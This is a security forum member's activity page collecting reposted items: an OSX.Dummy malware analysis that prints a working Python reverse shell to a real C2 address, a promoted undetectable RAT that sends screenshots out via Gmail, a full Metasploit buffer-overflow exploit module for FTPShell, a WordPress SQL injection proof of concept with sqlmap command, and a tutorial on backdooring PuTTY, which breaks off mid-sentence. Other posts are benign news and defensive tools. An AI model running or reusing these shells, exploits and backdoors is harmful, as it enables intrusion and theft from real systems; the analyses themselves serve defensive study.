Jump to content

OKQL

Active Members
  • Content Count

    2642
  • Joined

  • Last visited

  • Days Won

    68

OKQL last won the day on July 3

OKQL had the most liked content!

Community Reputation

1358 Excellent

4 Followers

About OKQL

  • Rank
    Idle

Recent Profile Visitors

7144 profile views
  1. Early today, Remco Verhoef (@remco_verhoef) posted an interesting entry to SANS 'InfoSec Handlers Diary Blog'. Titled "Crypto community target of MacOS malware" he noted: His great writeup notes the initial infection vector and provides an overview of the malware, including its method of persistence (launch daemon) and purpose (reverse shell). Here, we dive in a touch deeper into the malware and illustrate how Objective-See's tools can generically thwart this new threat, at every step of the way! OSX.Dummy Remco Verhoef states the malware attacks are: Apparently attackers are asking users to infect themselves, via the following command: $ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script If users fall for this (rather lame social engineering trick, a rather massive machO binary will be downloaded and executed. Massive you say? Yes, it clocks in at 34M: $ du -h /tmp/script 34M script Using WhatsYourSign, we can see that the malicious binary is not signed: Normally such a binary would be blocked by GateKeeper. However if users are downloading and running a binary directly via terminal commands, GateKeeper does not come into play and thus unsigned binary will be allowed to execute. Does this count as a GateKeeper bypass? Maybe? ...I guess the take away here is (yet again) the builtin macOS malware mitigations should never be viewed as a panacea. Unfortunately this binary remains 100% undetected (0/60) all AV engines on VirusTotal: Moving on, if we open the binary in Hopper, the reason for it's size is clear. Various libraries such as OpenSSL and V8 appear to be statically compiled in: Since it's a) Friday PM and b) this binary is massive, filled with all sorts of library code, we're going to skip static analysis and hop right into dynamic analysis. In a High Sierra virtual machine (vm) with various Objective-See tools installed, we execute the malware in order to dynamically observe its actions. Via the ProcInfo process monitor, it's easy to passively see exactly that malware is up to! First, the malware sets script to be owned as root: # procInfo monitoring for process events... process start: pid: 432 path: /usr/bin/sudo args: ( "/usr/bin/sudo", "-S", "-p", "#node-sudo-passwd#", chown, root, "/tmp/script.sh" ) As the malware executes sudo to change the file's permissions to root, this will require the user enter their password in the terminal. This is saved by the malware to /tmp/dumpdummy: # sudo fs_usage -w -f filesystem open /tmp/dumpdummy script.5354 pwrite F=19 script.5354 close F=19 script.5354 # cat /tmp/dumpdummy hunter2 The malware then sets the script to be executable via chmod +x: # procInfo monitoring for process events... process start: path: /usr/bin/sudo user: 501 args: ( "/usr/bin/sudo", "-S", "-p", "#node-sudo-passwd#", chmod, "+x", "/tmp/script.sh" ) Following this, the malware continues by: moving the script into /var/root mv "/tmp/script.sh" "/var/root/" dumping a plist file to /tmp/com.startup.plist and then moving into the LaunchDaemons directory mv "/tmp/com.startup.plist" "/Library/LaunchDaemons/ setting the owner of the com.startup.plist plist to root chown root "/Library/LaunchDaemons/com.startup.plist" launching the com.startup.plist launch daemon launchctl load "-w" "/Library/LaunchDaemons/com.startup.plist" At this point the malware has persisted a malicious launch daemon. This is kindly noted by BlockBlock which detects and alerts on this persistence attempt: As noted in the BlocKBlock alert, the path to the launch daemon plist is /Library/LaunchDaemons/com.startup.plist. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>KeepAlive</key> <true/> <key>Label</key> <string>com.startup</string> <key>Program</key> <string>/var/root/script.sh</string> <key>RunAtLoad</key> <true/> </dict> </plist> As the RunAtLoad key is set to true the value of the Program key, /var/root/script.sh, will be automatically executed by the OS whenever the system is rebooted. Let's look at the script.sh file: #!/bin/bash while : do python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);' sleep 5 done Ah a python script! As noted by Remco Verhoef (@remco_verhoef) in his writeup, this will attempt to connect to 185.243.115.230 on port 1337. It then duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the -i flag. In other words, it's setting up an interactive reverse shell. If you have a firewall product installed, such as Objective-See's LuLu, this network activity will be detected: If the connection to the attacker's C&C server (185.243.115.230:1337) succeeds, the attacker will be able to arbitrarily execute commands (as root!) on the infected system. Conclusion Today we analyzed a new piece of mac malware. I'm calling it OSX.Dummy as: the infection method is dumb the massive size of the binary is dumb the persistence mechanism is lame (and thus also dumb) the capabilities are rather limited (and thus rather dumb) it's trivial to detect at every step (that dumb) ...and finally, the malware saves the user's password to dumpdummy To check if you're infected run KnockKnock as root (since the malware set's it components to be readable only by root). Look for an unsigned launch item com.startup.plist executing something named 'script.sh': One can also look for an instance of python running running as root, with the aforementioned reverse shell commands: $ ps aux | grep -i python root python -c import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); Source: objective-see.com
  2. macOS-Fortress macOS-Fortress: Firewall, Blackhole, and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers Kernel-level, OS-level, and client-level security for macOS. Built to address a steady stream of attacks visible on snort and server logs, as well as blocks ads, malicious scripts, and conceal information used to track you around the web. After this package was installed, snort and other detections have fallen to a fraction with a few simple blocking actions. This setup is a lot more capable and effective than using a simple adblocking browser add-on. There's a world of difference between ad-filled web pages with and without a filtering proxy server. It's also saved me from inadvertantly clicking on phishing links. Proxy features macOS adaptive firewall Adaptive firewall to brute force attacks IP blocks updated about twice a day from emergingthreats.net (IP blocks, compromised hosts, Malvertisers) and dshield.org’s top-20 Host blocks updated about twice a day from hphosts.net EasyList Tracker and Adblock Rules to Proxy Auto Configuration (PAC) proxy.pac file and Privoxy Actions and Filters Uses easylist-pac-privoxy and adblock2privoxy to easily incorporate multiple blocking rulesets into both PAC and Privoxy formats, including easyprivacy.txt, easylist.txt, fanboy-annoyance.txt, fanboy-social.txt, antiadblockfilters.txt, malwaredomains_full.txt, and the anti-spamware list adblock-list.txt. The install script readme-and-install.sh installs and configures an macOS Firewall and Privatizing Proxy. It will: Prompt you to install Apple's Xcode Command Line Tools and Macports Uses Macports to download and install several key utilities and applications (wget gnupg p7zip squid privoxy nmap) Configure macOS's PF native firewall (man pfctl, man pf.conf), squid, and privoxy Turn on macOS's native Apache webserver to serve the Automatic proxy configuration http://localhost/proxy.pac Networking on the local computer can be set up to use this Automatic Proxy Configuration without breaking App Store or other updates (see squid.conf) Uncomment the nat directive in pf.conf if you wish to set up an OpenVPN server Install and launch daemons that download and regularly update open source IP and host blacklists. The sources are emergingthreats.net (net.emergingthreats.blockips.plist), dshield.org (net.dshield.block.plist), hosts-file.net (net.hphosts.hosts.plist), and EasyList (com.github.essandess.easylist-pac.plist, com.github.essandess.adblock2privoxy.plist) Installs a user launch daemon that deletes flash cookies not related to Adobe Flash Player settings every half-hour (http://goo.gl/k4BxuH) After installation the connection between clients and the internet looks this this: Application proxy.pac port 3128Squid port 8118Privoxy Internet An auxilliary nginx-based webserver (nominally on localhost:8119) is used for both a proxy.pac ad and tracker blackhole and for CSS element blocking rules with the Privoxy configuration generated by adblock2privoxy. Public Service Announcement This firewall is configured to block all known tracker and adware content—in the browser, in-app, wherever it finds them. Many websites now offer an additional way to block ads: subscribe to their content. Security and privacy will always necessitate ad blocking, but now that this software has become mainstream with mainstream effects, ad blocker users must consider the potential impact of ad blocking on the writers and publications that are important to them. Personally, two publications that I gladly pay for, especially for their important 2016 US Presidential election coverage, are the New York Times and The Atlantic. I encourage all users to subscribe to their own preferred publications and writers. Tracker blocking Lightbeam, the tracking tracker Firefox add-on, shows how ad- and tracker-blocking works to prevent third parties monitoring you or your children's online activities. My daughter enjoys the learning exercises at the children's website ABCya!. The Lightbeam graph below on the left shows all the third party trackers after less than a minute of browser activity, without using a privatizing proxy. The graph on the right shows all this tracker activity blocked when this privatizing proxy is used. Lightbeam graph without proxy Lightbeam graph with proxy This problem is the subject of Gary Kovacs's TED talk, Tracking Our Online Trackers: Attack blocking The snort intrusion detection system reports far fewer events when known attack sites are blackholed by the packet filter: snort+BASE Overview snort+BASE Events Installation git clone --recurse https://github.com/essandess/macOS-Fortress.git cd macOS-Fortress sudo sh ./readme-and-install.sh Disabling sudo sh ./disable.sh Notes Configure the squid proxy to accept connections on the LAN IP and set LAN device Automatic Proxy Configurations to http://lan_ip/proxy.pac to protect devices on the LAN. Count the number of attacks since boot with the script pf_attacks. ``Attack'' is defined as the number of blocked IPs in PF's bruteforce table plus the number of denied connections from blacklisted IPs in the tables compromised_ips, dshield_block_ip, and emerging_threats. Both squid and Privoxy are configured to forge the User-Agent. The default is an iPad to allow mobile device access. Change this to your local needs if necessary. Whitelist or blacklist specific domain names with the files /usr/local/etc/whitelist.txt and /usr/local/etc/blacklist.txt. After editing these file, use launchctl to unload and load the plist /Library/LaunchDaemons/net.hphosts.hosts.plist, which recreates the hostfile /etc/hosts-hphost and reconfigures the squid proxy to use the updates. Sometimes pf and privoxy do not launch at boot, in spite of the use of the use of their launch daemons. Fix this by hand after boot with the scripts macosfortress_boot_check, or individually using pf_restart, privoxy_restart, and squid_restart. And please post a solution if you find one. All open source updates are done using the wget -N option to save everyone's bandwidth Security These services are intended to be run on a secure LAN behind a router firewall. The default proxy configuration will only accept connections made from the local computer (localhost). If you change this to accept connections from any client on your LAN, do not configure the router to forward ports 3128 or 8118, or you will be running an open web proxy. Source
  3. Security researchers at Microsoft have unveiled details of two critical and important zero-day vulnerabilities that had recently been discovered after someone uploaded a malicious PDF file to VirusTotal, and get patched before being used in the wild. In late March, researchers at ESET found a malicious PDF file on VirusTotal, which they shared with the security team at Microsoft "as a potential exploit for an unknown Windows kernel vulnerability." After analyzing the malicious PDF file, the Microsoft team found that the same file includes two different zero-day exploits—one for Adobe Acrobat and Reader, and the other targeting Microsoft Windows. Since the patches for both the vulnerabilities were released in the second week of May, Microsoft released details of both the vulnerabilities today, after giving users enough time to update their vulnerable operating systems and Adobe software. According to the researchers, the malicious PDF including both the zero-days exploit was in the early development stage, "given the fact that the PDF itself did not deliver a malicious payload and appeared to be proof-of-concept (PoC) code." It seems someone who could have combined both the zero-days to build an extremely powerful cyber weapon had unintentionally and mistakenly lost the game by uploading his/her under-development exploit to VirusTotal. The zero-day vulnerabilities in question are a remote code execution flaw in Adobe Acrobat and Reader (CVE-2018-4990) and a privilege escalation bug in Microsoft Windows (CVE-2018-8120). Leveraging shellcode execution from the first vulnerability, the attacker uses the second Windows kernel exploit to break the Adobe Reader sandbox and run it with elevated privileges. Since this malicious PDF sample was under development at the time of detection, it apparently included a simple PoC payload that dropped an empty vbs file in the Startup folder. Microsoft and Adobe have since released corresponding security updates for both the vulnerabilities in May. For more technical details of the exploits, you can head on to Microsoft and ESET blogs. Via thehackernews.com
  4. ███████╗ █████╗ ██████╗ ██╗ ███████╗ ███████╗██╗ ██╗███████╗ ██╔════╝██╔══██╗██╔════╝ ██║ ██╔════╝ ██╔════╝╚██╗ ██╔╝██╔════╝ █████╗ ███████║██║ ███╗██║ █████╗ █████╗ ╚████╔╝ █████╗ ██╔══╝ ██╔══██║██║ ██║██║ ██╔══╝ ██╔══╝ ╚██╔╝ ██╔══╝ ███████╗██║ ██║╚██████╔╝███████╗███████╗ ███████╗ ██║ ███████╗ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚══════╝ ╚══════╝ ╚═╝ ╚══════╝ Jerry Shaw, you have been activated Find your friends Social Media Profiles with ease This only works if their Facebook Profile is public What does this do? In simple words you have at least one Image of the Person you are looking for and a clue about its name. You feed this program with it and it tries to find Instagram, Youtube, Facebook, Twitter Profiles of this Person. How does it work? You give it a name and at least one photo. It then searches Facebook for this name and does Facial Recognition to determine the right Facebook Profile. After that it does a Google and ImageRaider Reverse Image Search to find other Social Media Profiles. If a Instagram Profile was found it will be verified by comparing your known photo of the Person to some of the Instagram Pictures. In the end you get a PDF Report How to use it Automated Prequisites Installation wget https://raw.githubusercontent.com/ThoughtfulDev/EagleEye/master/pre.sh && chmod +x pre.sh && ./pre.sh Manual Prequisites Installation $ sudo apt update && sudo apt upgrade -y $ sudo apt install git python3 python3-pip python3-dev $ sudo apt install libgtk-3-dev libboost-all-dev build-essential cmake libffi-dev $ git clone https://github.com/ThoughtfulDev/EagleEye $ cd EagleEye && sudo pip3 install -r requirements.txt $ sudo pip3 install --upgrade beautifulsoup4 html5lib spry Regardless of which option you choose make sure that you have Firefox installed If you have Firefox installed, download the latest release of the Geckodriver for you Architecture. Note: If you are using Firefox ESR(like Kali does) please use the Geckodriver Version 17 Next change the value in config.json to the path of the geckodriver e.g { "DEFAULTS": { ... }, "WEBDRIVER": { "ENGINE": "firefox", "PATH": "PATH TO geckodriver e.g C:\\Program Files\\geckodriver.exe" }, "FILTER": [ .... ], ... } Make the Geckodriver executable $ chmod +x /path/to/geckodriver I will try to implement the Chrome Webdriver as soon as possible Next put at least one Image of the Person you want to find in the known folder. (Has to be .jpg for now) Then run the program $ python3 eagle-eye.py To see a list of all available Options just type $ python3 eagle-eye.py -h The ImageRaider Reverse Image Search can take some minutes 1-15 Minutes depending on the count of Images Screenshots? Example Report (Used one Image of Emeraude Toubia) Download: EagleEye-master.zip Source
  5. Python based backdoor that uses Gmail to exfiltrate data through attachment. This RAT will help during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends it to an attacker as an e-mail attachment. Powershell-RAT Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. This RAT will help someone during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment. Note: This piece of code is Fully UnDetectable (FUD) by Anti-Virus (AV) software. This project must not be used for illegal purposes or for hacking into system where you do not have permission, it is strictly for educational purposes and for people to experiment with. Any suggestions or ideas for this tool are welcome - just tweet me on @ManiarViral Screenshot: On the first run of the Powershell-RAT user will get options as below: Using Hail Mary option to backdoor a Windows machine: Successfully taking screenshots of the user activity: Data exfiltrated as an email attachment using Gmail: Setup: Throwaway Gmail email address Enable "Allow less secure apps" by going to https://myaccount.google.com/lesssecureapps Modify the $username & $password variable for your account in the Mail.ps1 Powershell file Modify $msg.From & $msg.To.Add with throwaway gmail address Download: Powershell-RAT-master.zip Source
  6. This Metasploit module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote code execution. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer def initialize(info = {}) super(update_info(info, 'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote code execution. }, 'Author' => [ 'r4wd3r', # Original exploit author 'Daniel Teixeira' # MSF module author ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2018-7573'], [ 'EDB', '44596' ] ], 'Payload' => { 'Space' => 400, 'BadChars' => "\x00\x22\x0d\x0a\x0b" }, 'Platform' => 'win', 'Targets' => [ # CALL ESI in FTPShell.exe : 0x00452eed [ 'Windows Universal', {'Ret' => "\xed\x2e\x45" } ] ], 'Privileged' => false, 'DefaultOptions' => { 'SRVHOST' => '0.0.0.0', 'EXITFUNC' => 'thread' }, 'DisclosureDate' => 'Mar 4 2017', 'DefaultTarget' => 0)) register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ] end def exploit srv_ip_for_client = datastore['SRVHOST'] if srv_ip_for_client == '0.0.0.0' if datastore['LHOST'] srv_ip_for_client = datastore['LHOST'] else srv_ip_for_client = Rex::Socket.source_address('50.50.50.50') end end srv_port = datastore['SRVPORT'] print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}") super end def on_client_connect(client) p = regenerate_payload(client) return if p.nil? print_status("#{client.peerhost} - connected.") res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") unless res.empty? print_status("#{client.peerhost} - Response: Sending 220 Welcome") welcome = "220 Welcome.\r\n" client.put(welcome) res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") print_status("#{client.peerhost} - Response: sending 331 OK") user = "331 OK.\r\n" client.put(user) res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") print_status("#{client.peerhost} - Response: Sending 230 OK") pass = "230 OK.\r\n" client.put(pass) res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") sploit = '220 "' sploit << payload.encoded sploit << "\x20" * (payload_space - payload.encoded.length) sploit << target.ret sploit << "\" is current directory\r\n" print_status("#{client.peerhost} - Request: Sending the malicious response") client.put(sploit) end end Source
  7. OKQL

    ThanatosDecryptor

    ThanatosDecryptor is an executable program that attempts to decrypt certain files encrypted by the Thanatos malware. File types currently supported include: Image: .gif, .tif, .tiff, .jpg, .jpeg, .png Video: .mpg, .mpeg, .mp4, .avi Audio: .wav Document: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .odt, .ods, .odp, .rtf Other: .zip, .7z, .vmdk, .psd, .lnk In order to decrypt files as quickly as possible, ThanatosDecryptor should be run on the original machine infected with the malware, and against the original .THANATOS files that it created. ThanatosDecryptor has been tested against versions 1 and 1.1 of the malware. Known malware sample hashes include: 55aa55229ea26121048b8c5f63a8b6921f134d425fba1eabd754281ca6466b70 97d4145285c80d757229228d13897820d0dc79ab7aa3624f40310098c167ae7e 8df0cb230eeb16ffa70c984ece6b7445a5e2287a55d24e72796e63d96fc5d401 bad7b8d2086ac934c01d3d59af4d70450b0c08a24bc384ec61f40e25b7fbfeb5 02b9e3f24c84fdb8ab67985400056e436b18e5f946549ef534a364dff4a84085 fe1eafb8e31a84c14ad5638d5fd15ab18505efe4f1becaa36eb0c1d75cd1d5a9 Thanatos Overview When run, the Thanatos malware looks for files recursively in the following directories: Desktop Documents Downloads Favourites Music OneDrive Pictures Videos For each file found, the malware derives an encryption key from the number of milliseconds that the infected computer has been running (via a call to GetTickCount), encrypts the file using 256-bit AES encryption, and then discards the encryption key. It would be practically impossible to brute-force guess the 256-bit AES encryption key directly, but since the malware derives this key from the system uptime (a 32-bit value) the key is effectively 32-bits in length. On the virtual machine that I tested on, around 100,000 key derivations and AES decryption operations (on one AES block worth of data, needed for decryption success verification) could be performed every second, meaning in the worst case it would take around 12 hours to successfully guess the key if the system uptime value was random. The system uptime is not random, though. The maximum number of milliseconds you can store in a 32-bit value comes out to be 49.7 days worth, and many people tend to shutdown or hibernate their computers before then (or let them sleep from time to time). Thus, the system uptime at time of infection is likely to be a fairly low value - starting at 0 and guessing your way up is a decent approach. A further optimization is enabled by the fact that the system uptime is written to the Windows Event Logs around once per day. Also, the malware does not modify the .THANATOS file creation dates, so with this information the search space can be reduced to approx. the number of milliseconds within the 24 hours before infection. At 100k attempts per second, it would take around 14 minutes to guess the key under these conditions. ThanatosDecryptor Operation When run, ThanatosDecryptor first searches the directories listed above for files with the .THANATOS file extension. Once found, the original file extension (which is preserved by the malware in the file name write before .THANATOS) is compared with the list of file types supported by ThanatosDecryptor. If the file type is one supported, the file gets queued for decryption. ThanatosDecryptor also parses the Windows Event Log for the daily uptime messages and uses the encrypted file time metadata to determine a starting value for decryption. This value is used to derive an encryption key, an AES decryption operation is done against the file contents, and the resulting byte are compared against values known to be at the beginning of those file types. If the comparison is unsuccessful, increments the seed and tries this process again. Otherwise, the file is decrypted and written out with the original file name. Finally, once one file has been successfully encrypted, ThanatosDecryptor uses the SEED value from that decryption attempt as a starting point for decryption attempts against follow-on files (since they are all likely to be very similar). Running the Program Download the latest ThanatosDecryptor.exe file from the Release directory and run it on the infected system as the user that had his/her files encrypted. Building Visual Studios is required for building. Visual Studio 2017 Community Edition works for me! To build ThanatosDecryptor from source, clone this repo, cd into the ThanatosDecryptor directory, and from the 'Developer Command Prompt for VS 2017' that ships with Visual Studio 2017, run the following command: msbuild ThanatosDecryptor.vcxproj /p:Configuration=Release /p:Platform=Win32 It's easiest to find the Developer Command Prompt using the Windows Start Menu search box. Example output Found the following files able to be decrypted: C:\Users\zelda\Desktop\testfiles\test.7z.THANATOS C:\Users\zelda\Desktop\testfiles\Test.doc.THANATOS C:\Users\zelda\Desktop\testfiles\Test.docx.THANATOS C:\Users\zelda\Desktop\testfiles\test.gif.lnk.THANATOS [...] C:\Users\zelda\Desktop\testfiles\test.xlsx.THANATOS C:\Users\zelda\Desktop\testfiles\test.zip.THANATOS Beginning decryption attempt Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.7z.THANATOS Tried 393288 seed values thus far Successful decryption verification! Seed: 516031 Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.7z Attempting to decrypt C:\Users\zelda\Desktop\testfiles\Test.doc.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516031 Tried 8257 seed values thus far Successful decryption verification! Seed: 516031 Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\Test.doc Attempting to decrypt C:\Users\zelda\Desktop\testfiles\Test.docx.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516031 Tried 8257 seed values thus far Successful decryption verification! Seed: 516031 Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\Test.docx Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.gif.lnk.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516031 Tried 8257 seed values thus far Successful decryption verification! Seed: 516046 Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.gif.lnk Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.gif.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516046 [...] Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.xlsx.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516062 Tried 8226 seed values thus far Successful decryption verification! Seed: 8ca3e Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.xlsx Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.zip.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516062 Tried 8226 seed values thus far Successful decryption verification! Seed: 8ca3e Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.zip Press any key to exit Note how some files were encrypted using the same Seed value - according to the GetTickCount man page, the uptime has a resolution of between 10ms and 16ms, which means that it can take between 10-16 ms for another call to GetTickCount to return a different value. Download: ThanatosDecryptor-master.zip (1.8MB) Source
  8. The Wi-Fi Alliance today officially launched WPA3—the next-generation Wi-Fi security standard that promises to eliminate all the known security vulnerabilities and wireless attacks that are up today including the dangerous KRACK attacks. WPA, or Wi-Fi Protected Access, is a standard designed to authenticate wireless devices using the Advanced Encryption Standard (AES) protocol and is intended to prevent hackers from eavesdropping on your wireless data. However, in late last year, security researchers uncovered a severe flaw in the current WPA2 protocol, dubbed KRACK (Key Reinstallation Attack), that made it possible for attackers to intercept, decrypt and even manipulate WiFi network traffic. Although most device manufacturers patched their devices against KRACK attacks, the WiFi Alliance, without much delay, rushed to finalize and launch WPA3 in order to address WPA2's technical shortcomings from the ground. What is WPA3? What New Security Features WPA3 Offers? WPA3 security standard will replace the existing WPA2 that has been around for at least 15 years and widely used by billions of devices every day. The new security protocol provides some big improvements for Wi-Fi enabled devices in terms of configuration, authentication, and encryption enhancements, making it harder for hackers to hack your Wi-Fi or eavesdrop on your network. On Monday, the Wi-Fi Alliance launched two flavors of latest security protocol—WPA3-Personal and WPA3-Enterprise—for personal, enterprise, and IoT wireless networks. Here are some key features provided by the new protocol: 1.) Protection Against Brute-Force Attacks WPA3 provides enhanced protection against offline brute-force dictionary attacks, making it harder for hackers to crack your WiFi password—even if you choose less complex passwords—by using commonly used passwords over and over again. 2.) WPA3 Forward Secrecy WPA3 leverages SAE (Simultaneous Authentication of Equals) handshake to offer forward secrecy, a security feature that prevents attackers from decrypting old captured traffic even if they ever learn the password of a network. 3.) Protecting Public/Open Wi-Fi Networks WPA3 strengthens user privacy in open networks through individualized data encryption, a feature that encrypts the wireless traffic between your device and the Wi-Fi access point to mitigate the risk of Man-in-the-Middle (MitM) attacks. To prevent such passive attacks, WPA3 could add support for Opportunistic Wireless Encryption (OWE). 4.) Strong Encryption for Critical Networks Using WPA3 Enterprise, critical Wi-Fi networks handling sensitive information (such as government, , and industrial organizations), can protect their Wi-Fi connections with 192-bit encryption. Wi-Fi Easy Connect Alongside WPA3, the WiFi Alliance has also announced a new feature, called Wi-Fi Easy Connect, that simplifies the process of pairing smart home gadgets (without any screen or display) to your router. Wi-Fi Easy Connect is a replacement for Wi-Fi Protected Setup (WPS), which has been considered insecure. With the support for Easy Connect, you will be able to pair your smart gadget with the router by simply scanning a QR code with your smartphone to have the Wi-Fi credentials automatically sent to the new smart device. It should be noted that both WPA3 and Wi-Fi Easy Connect will not hit the mainstream right away. In fact, it is going to be a many-years-long process that will require new routers and smart gadgets to support WPA3. Therefore, WPA2 will not stop working any time soon, and devices with WPA3 support will still be able to connect with devices that use WPA2 for the working of your gadgets, but WPA3 support will eventually become mandatory as adoption grows. WPA3 is set to roll out later this year and is expected to hit mass adoption in late 2019, when it eventually become a requirement for devices to be considered Wi-Fi certified, according to the WiFi Alliance. Via thehackernews.com
  9. OKQL

    Project Cerium : Antivirus

    ba da, doar ca nici unul din top nu mi-a detectat niste rootkit-uri scrise de independent parca...
  10. OKQL

    Project Cerium : Antivirus

    restul care? am cautat ceva serios zilele trecute si nimic
  11. Project Cerium : Antivirus Open Source Antivirus For Humans How to Use clone the repo : git clone https://github.com/xedtech/ceriumav.git cd ceriumav python3 av.py Screenshots Source
  12. WordPress iThemes Security plugin versions prior to 7.0.3 suffer from a remote SQL injection vulnerability. # Exploit Title: WordPress Plugin iThemes Security(better-wp-security) <= 7.0.2 - Authenticated SQL Injection # Date: 2018-06-25 # Exploit Author: Alirim Emini # Website: https://www.sentry.co.com/ # Vendor Homepage: https://ithemes.com/ # Software Link: https://wordpress.org/plugins/better-wp-security/ # Version/s: 7.0.2 and below # Patched Version: 7.0.3 # CVE : 2018-12636 # WPVULNDB: https://wpvulndb.com/vulnerabilities/9099 Plugin description: iThemes Security works to lock down WordPress, fix common holes, stop automated attacks and strengthen user credentials. With advanced features for experienced users, this WordPress security plugin can help harden WordPress. Description: WordPress Plugin iThemes Security(better-wp-security) before 7.0.3 allows remote authenticated users to execute arbitrary SQL commands via the 'orderby' parameter in the 'itsec-logs' page to wp-admin/admin.php. Technical details: Parameter orderby is vulnerable because backend variable $sort_by_column is not escaped. File: better-wp-security/core/admin-pages/logs-list-table.php Line 271: if ( isset( $_GET[' orderby '], $_GET['order'] ) ) { Line 272: $ sort_by_column = $_GET[' orderby ']; File: better-wp-security/core/lib/log-util.php Line 168: $query .= ' ORDER BY ' . implode( ', ', $ sort_by_column )); Proof of Concept (PoC): The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin: http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0 Using SQLMAP: sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3 https://packetstormsecurity.com/files/148294/WordPress-iThemes-Security-SQL-Injection.html
  13. OKQL

    Decompilare aplicatie Android

    jadx-gui --show-bad-code 1.app.apk
  14. OKQL

    am nevoie de un programator

    da-mi PM cu site-urile si vrei sa modifici la ele
  15. Welcome to my next blog post. Today i want to show you some basic pentesting stuff. We will manually backdooring a PE-File, in this case the putty client. I used the following software setup: Windows 10 Pro 32 Bit Putty Stud_PE Immunity Debugger Before we are getting our hands into assembly, i want to explain what we will do. We will add a section header named .evil to our file and hijack the file‘s execution flow. At the entry point we will redirect the execution to our shellcode and after gaining our shell, the ordinary appliaction is running (putty starts). #0x01 Adding Section At first we are going to add our new section .evil to our file through Stud_PE. The following pictures are pritty self explaining I choosed a section size of 1500 Bytes which are filled with nullbytes. That‘s more than enough for our shellcode. After saving the file and load it into Immunity you can see the differences between the two files (new section .evil is spawned). And if you look at the adress of .evil you will see the following (our predifined nullbytes) -> Great! While checking our new section you may noticed, that the adresses has slighty changed. The last 4 Bytes are always nullbytes but the first 4 Bytes are changing through every reloading process of the file. 00FB0000 <-> 00250000 That‘s a kernel protection ASLR, you can find more information about this countermeasurement here. This makes some more work, but isn‘t a problem (more later). #0x02 Hijack Execution Flow Now we are looking at the entry point of our file in Immunity. The First instruction at 0x002B7FD6 is a call instruction. We are going to change the first instructions to jump into our code cave (.evil). Before changing any assembly instruction copy the ‚old‘ instructions to a text file, because we are going to resume to the application flow after executing our shellcode. Mark the first instruction and type „jmp [adress of .evil]“ in my case „jmp 0x002E3000“. After hitting enter you will see the following: Save the changes to a new file and open it in immunity. Now we are taking the first instruction with F7 and are landing in our code cave of nullbytes at the .evil adress. For our testing purpose we replace the nullbytes with nops. To do so just mark all the nullbytes of the code cave and do the following: We save the state of our registers on the top of the stack through the assembly instruction pushad && pushfd. At the end of our code cave we restore our register states with popfd and popad. So far no problems (hopefully). Now we do some math do encounter the ASLR protection. We want to restore all overwritten functions at the end of our code cave and jump right back into the „old“ execution flow. If you are looking at the entry ponit of our file, you will see that only the call instruction is missing. Without enabled ASLR we could use the saved adress from our textfile just like „call x002B8265“, but you see that the adress of the second instruction „jmp 0x002B7E6E“ has also changed… ASLR Hurray! What now? We have to determine the offset between the old adresses to calculate the new overwritten call instruction. Instead trying to explain the several locations, adresses and relations i try to show it in following pictures (if this isn‘t enough, plz tell me via twitter and i will add text sections) In the end we got the 